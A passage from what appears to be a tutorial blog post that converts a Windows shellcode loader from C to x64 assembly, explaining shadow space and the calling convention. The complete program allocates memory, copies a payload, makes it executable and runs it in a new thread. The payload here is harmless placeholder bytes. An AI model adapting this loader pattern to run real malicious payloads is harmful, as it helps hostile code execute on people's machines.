    jmp rbx         ; Go back to the stored instruction address
    ret

To call the routine, just do this:

    mov rax, getchar
    call    shadow_call

But honestly, I think it's less complicated to just do the handling of shadow space yourself.

Shadow spaces threw me off a bit when I was researching about this, but everything I said above should be enough of an explanation. If however you want more then go here and then here.

Microsoft x64 Calling Convention

It is also important to note that the calling convention for functions is different for Windows compared to other operating systems.

As a quick reference, the first four integer or pointer parameters of a function are passed in registers rcx, rdx, r8, and r9, in that order.

Here's an example from our code:

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

In assembly, we supply the parameters like so:

    ;; Make new buffer as executable
    mov rcx, [exec_mem]      ;; First parameter
    xor rdx, rdx
    mov dl, [payload_len]    ;; Second parameter
    mov r8, 0x20             ;; Third parameter (PAGE_EXECUTE_READ)
    lea r9, [old_protect]    ;; Fourth parameter
    sub     rsp, 32          ;; Reserve shadow space
    call    VirtualProtect   ;; Call function
    add     rsp, 32          ;; Release shadow space

For functions that require more than four parameters, the stack needs to be utilized. This can get confusing so let me point you to this post as it has diagrams for visualization.

The final code

The rest of the code can be converted using the concepts I've described above. Here is the fully converted code:

    bits 64
    default rel

segment .data
    msg_hello   db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format  db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me  db  "Hit me!", 0xd, 0xa, 0

    ;; 4 byte payload
    payload     db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

segment .bss    
    exec_mem    resb    8
    old_protect resb    8   

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

main:
    push    rbp
    mov     rbp, rsp

    ;; Allocate a memory buffer for payload.
    mov rcx, 0
    xor rdx, rdx
    mov dl, [payload_len]
    mov r8, 0x3000
    mov r9, 0x4
    sub     rsp, 32 
    call    VirtualAlloc
    add     rsp, 32 

    mov [exec_mem], rax

    lea     rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    lea r8, [payload]
    sub     rsp, 32 
    call    printf
    add     rsp, 32 

    lea     rcx, [msg_format]
    lea rdx, [msg_exec_addr]
    mov r8, [exec_mem]
    sub     rsp, 32
    call    printf
    add     rsp, 32

    ;; Copy payload to new buffer
    mov rcx, [exec_mem]
    lea rdx, [payload]
    xor r8, r8
    mov r8b, [payload_len]
    sub     rsp, 32     
    call    RtlMoveMemory
    add     rsp, 32 

    ;; Make new buffer as executable
    mov rcx, [exec_mem]
    xor rdx, rdx
    mov dl, [payload_len]
    mov r8, 0x20
    lea r9, [old_protect]
    sub     rsp, 32     
    call    VirtualProtect
    add     rsp, 32

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32         
    call    printf
    add     rsp, 32 

    sub     rsp, 32             
    call    getchar
    add     rsp, 32

    pop rax

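    ;; If all good, run the payload
    test    eax, eax            ;; VirtualProtect returns 0 on failure
    jz  ifrvzero

    xor rcx, rcx                ;; lpThreadAttributes = NULL
    xor rdx, rdx                ;; dwStackSize = 0
    mov r8, [exec_mem]          ;; lpStartAddress
    xor r9, r9                  ;; lpParameter = NULL
    push    r9                  ;; Sixth parameter: lpThreadId = NULL
    push    r9                  ;; Fifth parameter: dwCreationFlags = 0
    sub     rsp, 32             ;; Reserve shadow space
    call    CreateThread
    add     rsp, 48             ;; Release shadow space and the two stack parameters

    mov rcx, rax                ;; Thread handle returned by CreateThread
    mov rdx, 0xFFFFFFFF         ;; INFINITE
    sub     rsp, 32
    call    WaitForSingleObject
    add     rsp, 32

ifrvzero:

    xor     rcx, rcx            ;; Exit code 0 goes in rcx, the first parameter
    sub     rsp, 32
    call    ExitProcess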

As mentioned before, I did my best to match the structure of the assembly code to the C code to make it easy to compare how one section was translated to the other. There are other parts, like the jz ifrvzero conditional jump, that I didn't discuss, but those can easily be understood if you know the basics of assembly.

I've also uploaded the code to its own repository here. Updates and fixes to the code will be pushed there.


A lot of the concepts I've described in this post are lessons I learned while working on this project. Most of them can be researched individually, but I'm hoping that collecting them in one place will benefit the next bloke who is crazy enough to attempt the same.

Feel free to reach out to me on Twitter or LinkedIn for any questions or comments.